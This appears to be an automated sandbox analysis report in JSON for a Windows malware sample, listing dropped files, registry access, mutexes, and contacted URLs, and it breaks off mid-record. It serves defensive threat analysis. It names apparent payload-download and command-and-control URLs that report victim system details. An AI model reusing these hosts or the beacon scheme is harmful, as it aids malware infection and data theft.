{ "analysis_details": { "creation_time": "2017-09-25 22:32 (UTC+2)", "execution_successful": true, "number_of_processes": 11, "reputation_enabled": true, "termination_reason": "timeout", "type": "analysis_details", "version": 2, "vm_analysis_duration_time": "00:02:27" }, "artifacts": { "files": [ { "filename": "C:\\Users\\aDU0VK IWA5kLS\\Desktop", "hashes": [], "norm_filename": "c:\\users\\adu0vk iwa5kls\\desktop", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_OUTPUT_HANDLE", "hashes": [], "norm_filename": "std_output_handle", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_INPUT_HANDLE", "hashes": [], "norm_filename": "std_input_handle", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "CONOUT$", "hashes": [], "norm_filename": "conout$", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Temp\\Mbovxo.bat", "hashes": [ { "md5_hash": "6b02cf51939341cf79053976790bdae0", "sha1_hash": "7d1615ea6d3afc59f7f518b1fd49bd0ae2c2b1ed", "sha256_hash": "845ed9e3626f3b603301c7ab1987d763c13a9d8ee4444e69f181e52ebb881252", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\adu0vk iwa5kls\\appdata\\local\\temp\\mbovxo.bat", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "hashes": [], "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aDU0VK IWA5kLS", "hashes": [], "norm_filename": "c:\\users\\adu0vk iwa5kls", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\", "hashes": [], "norm_filename": "c:", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users", "hashes": [], "norm_filename": "c:\\users", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aDU0VK IWA5kLS\\Documents\\WindowsPowerShell\\profile.ps1", "hashes": [], "norm_filename": "c:\\users\\adu0vk iwa5kls\\documents\\windowspowershell\\profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aDU0VK IWA5kLS\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", "hashes": [], "norm_filename": "c:\\users\\adu0vk iwa5kls\\documents\\windowspowershell\\microsoft.powershell_profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\Mbovxo.bat", "hashes": [], "norm_filename": "c:\\users\\adu0vk~1\\appdata\\local\\temp\\mbovxo.bat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "\"C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\Mbovxo.bat\"", "hashes": [], "norm_filename": "c:\\users\\adu0vk iwa5kls\\desktop\\\"c:\\users\\adu0vk~1\\appdata\\local\\temp\\mbovxo.bat\"", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", "hashes": [], "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Temp\\Mvmubw.exe", "hashes": [ { "md5_hash": "0ebfd6e45dea48c7f54b5574d69da458", "sha1_hash": "11ad0fae8318bc72e1525c161c5df72a9da9430b", "sha256_hash": "3ba1b55c3268529b586e154b9117d25ae6c3667a2e869747c51bd88fd2a7a581", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\adu0vk iwa5kls\\appdata\\local\\temp\\mvmubw.exe", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winapp", "hashes": [], "norm_filename": "c:\\users\\adu0vk iwa5kls\\appdata\\roaming\\winapp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winapp\\Mvnucw.exe", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "0ebfd6e45dea48c7f54b5574d69da458", "sha1_hash": "11ad0fae8318bc72e1525c161c5df72a9da9430b", "sha256_hash": "3ba1b55c3268529b586e154b9117d25ae6c3667a2e869747c51bd88fd2a7a581", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\adu0vk iwa5kls\\appdata\\roaming\\winapp\\mvnucw.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\Mvmubw.exe", "hashes": [], "norm_filename": "c:\\users\\adu0vk~1\\appdata\\local\\temp\\mvmubw.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "client_id", "hashes": [ { "md5_hash": "c9e2607b0faa2a1d36e4ebc553f41698", "sha1_hash": "b8c4d60f72d70bbf8ce3ff1e16f7fe659cda9821", "sha256_hash": "fa6c18a934575a42088ed671a0bb0de633b8f00e1226a38596f6b625c1455e3e", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\adu0vk iwa5kls\\appdata\\roaming\\winapp\\client_id", "operations": [ "read", "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\client_id", "hashes": [], "norm_filename": "c:\\users\\adu0vk iwa5kls\\appdata\\roaming\\client_id", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "config.conf", "hashes": [], "norm_filename": "c:\\users\\adu0vk iwa5kls\\appdata\\roaming\\winapp\\config.conf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "group_tag", "hashes": [ { "md5_hash": "20d4581a76fac9a75b1300485c2c2ce4", "sha1_hash": "56f0501fc59c0a9f5f6967cd7f03e5d4f5b8adf6", "sha256_hash": "60e79d113cf1adb6e594a3ab1eef644f274cfaf004b576b6592da7aa6119b67d", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\adu0vk iwa5kls\\appdata\\roaming\\winapp\\group_tag", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\group_tag", "hashes": [], "norm_filename": "c:\\users\\adu0vk iwa5kls\\appdata\\roaming\\group_tag", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "Modules\\", "hashes": [], "norm_filename": "c:\\users\\adu0vk iwa5kls\\appdata\\roaming\\winapp\\modules", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [ { "ip_address": "93.185.102.11", "type": "ip_address_artifact", "version": 1 } ], "mutexes": [ { "mutex_name": "Global\\.net clr networking", "operations": [ "access", "delete" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "Global\\VLock", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [ { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Licenses", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020905-0000-0000-C000-000000000046}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020905-0000-0000-C000-000000000046}\\8.6", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020905-0000-0000-C000-000000000046}\\8.6\\409", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020905-0000-0000-C000-000000000046}\\8.6\\9", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020905-0000-0000-C000-000000000046}\\8.6\\0", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020905-0000-0000-C000-000000000046}\\8.6\\0\\win64", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020430-0000-0000-C000-000000000046}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0\\win64", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\\2.7", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\\2.7\\0", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\\2.7\\0\\win64", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{000204EF-0000-0000-C000-000000000046}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{000204EF-0000-0000-C000-000000000046}\\4.2", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{000204EF-0000-0000-C000-000000000046}\\4.2\\9", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{000204EF-0000-0000-C000-000000000046}\\4.2\\9\\win64", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{0D452EE1-E08F-101A-852E-02608C4D0BB4}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\\2.0", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\\2.0\\0", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\\2.0\\0\\win64", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\CLSID\\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\\DesignerFeatures", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\\InprocServer32", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{82B02373-B5BC-11CF-810F-00A0C9030074}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{82B02373-B5BC-11CF-810F-00A0C9030074}\\Control", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{82B02373-B5BC-11CF-810F-00A0C9030074}\\Insertable", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{82B02374-B5BC-11CF-810F-00A0C9030074}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{82B02374-B5BC-11CF-810F-00A0C9030074}\\Control", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{82B02374-B5BC-11CF-810F-00A0C9030074}\\Insertable", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{82B02375-B5BC-11CF-810F-00A0C9030074}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{82B02375-B5BC-11CF-810F-00A0C9030074}\\Control", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{82B02375-B5BC-11CF-810F-00A0C9030074}\\Insertable", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{8A683C92-BA84-11CF-8110-00A0C9030074}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{8A683C92-BA84-11CF-8110-00A0C9030074}\\Control", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{8A683C92-BA84-11CF-8110-00A0C9030074}\\Insertable", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{8A683C93-BA84-11CF-8110-00A0C9030074}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{8A683C93-BA84-11CF-8110-00A0C9030074}\\Control", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{8A683C93-BA84-11CF-8110-00A0C9030074}\\Insertable", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{1C3B4210-F441-11CE-B9EA-00AA006B1A69}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{1C3B4210-F441-11CE-B9EA-00AA006B1A69}\\Control", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{1C3B4210-F441-11CE-B9EA-00AA006B1A69}\\Insertable", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{909E0AE0-16DC-11CE-9E98-00AA00574A4F}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{909E0AE0-16DC-11CE-9E98-00AA00574A4F}\\Control", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{909E0AE0-16DC-11CE-9E98-00AA00574A4F}\\Insertable", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{AFC20920-DA4E-11CE-B943-00AA006887B4}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{AFC20920-DA4E-11CE-B943-00AA006887B4}\\Control", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{AFC20920-DA4E-11CE-B943-00AA006887B4}\\Insertable", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{5CEF5610-713D-11CE-80C9-00AA00611080}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{5CEF5610-713D-11CE-80C9-00AA00611080}\\Control", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{5CEF5610-713D-11CE-80C9-00AA00611080}\\Insertable", "type": "registry_artifact", "version": 1 }, { "operations": [ "read" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Licenses\\8804558B-B773-11d1-BC3E-0000F87552E7", "type": "registry_artifact", "version": 1 }, { "operations": [ "read" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Clsid\\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\\Instance CLSID", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Command Processor", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell\\1", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\Environment", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Environment", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key Management Service", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key Management Service\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\OAlerts", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\OAlerts\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Security", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [ { "operations": "GET", "type": "url_artifact", "url": "www.events4u.cz/kas23.png", "version": 1 }, { "operations": "GET", "type": "url_artifact", "url": "myexternalip.com/raw", "version": 1 }, { "operations": "GET", "type": "url_artifact", "url": "89.231.13.38/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/spk/", "version": 1 }, { "operations": "GET", "type": "url_artifact", "url": "89.231.13.38/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/0/Windows 7 x64 SP1/1031/87.142.156.87/4E7D329059DDCB1E5EC37D3CBBDFA46E247E2279DF57EA2055D11096E05BBEDA/ChqJujn6xjr2PYFE7lelOT6D/", "version": 1 }, { "operations": "GET", "type": "url_artifact", "url": "212.38.166.20/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/systeminfo64/", "version": 1 } ], "version": 1 }, "extracted_files": [ { "archive_path": "extracted_files/7d1615ea6d3afc59f7f518b1fd49bd0ae2c2b1ed", "file_type": "created_file", "id": "file_2", "md5_hash": "6b02cf51939341cf79053976790bdae0", "norm_filename": "c:\\users\\adu0vk iwa5kls\\appdata\\local\\temp\\mbovxo.bat", "sha1_hash": "7d1615ea6d3afc59f7f518b1fd49bd0ae2c2b1ed", "sha256_hash": 